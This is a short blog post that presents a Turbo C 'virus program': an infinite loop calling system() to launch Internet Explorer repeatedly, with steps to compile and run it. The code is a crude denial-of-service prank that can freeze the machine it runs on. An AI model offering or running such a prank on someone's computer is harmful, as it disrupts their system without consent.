Opening the internet explorer continuesly with virus program in c language

Type the following program in turboc2 (C Language)

Source code:-
void main(void)

   {
          for( ; ;)

           {

             system("c:\\progra~1\\intern~1\\iexplore.exe");
           }
   }

And save the above source code. Type the file INTERNET.C and compile above source code. Now close The turboc2 compiler. Open the Directory of the INTERNET.C faultlessly stored in(C:\turboc2\bin). Double click and open the executable file of (INTERNET.EXE).

0 comments:

Post a Comment